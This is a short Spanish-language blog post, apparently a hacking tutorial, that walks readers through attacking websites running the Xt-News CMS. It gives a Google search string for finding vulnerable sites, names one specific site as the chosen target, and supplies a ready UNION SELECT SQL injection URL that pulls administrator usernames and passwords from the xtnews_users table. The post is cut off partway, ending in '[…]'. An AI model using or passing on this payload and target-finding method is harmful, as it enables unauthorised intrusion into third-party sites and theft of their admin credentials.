vulneviridades
Trabajado Para Estas Vulnerabilidad vzla-Jesus ahy va el tutorial..
Bueno esta vulneravilidad consiste en una injecction SQL.
Para empezar si quieres buscar vulneravilidades Xt-News Tienes que tipear esto en google.
“Powered by Xt-News”
Resultado de la busqueda en google: http://www.google.com.mx/search?client=firefox-a&rls=org.mozilla%3A%3Aofficial&channel=s&hl=es&q=Powered+by+Xt-News&meta=&btnG=Buscar+con+Google
Aora escogemos alguna web la que sea.
En mi caso escogi esta: http://polyrando.org/xtnews/print.php?id_news=206
Aora lo que bamos a haces es coger nuestra SQL injecction que es la siguiente:
show_news.php?id_news=-1%20UNION%20SELECT%20%20id,user,null,null,mdp,null,null,null,null,null,null%20FROM%20xtnews_users%20WHERE%20%20admin=1
Aora pegamos eso […]
Etiquetas: vulneravilidades
0 comentarios:
Publicar un comentario
Suscribirse a Enviar comentarios [Atom]
<< Inicio